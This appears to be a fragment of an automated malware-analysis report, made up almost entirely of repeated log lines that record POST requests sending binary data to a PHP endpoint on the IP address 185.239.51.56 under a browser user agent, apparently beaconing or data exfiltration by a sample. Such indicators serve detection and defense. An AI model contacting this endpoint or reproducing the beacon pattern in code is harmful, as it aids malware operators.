                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2496Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1572Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1572Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
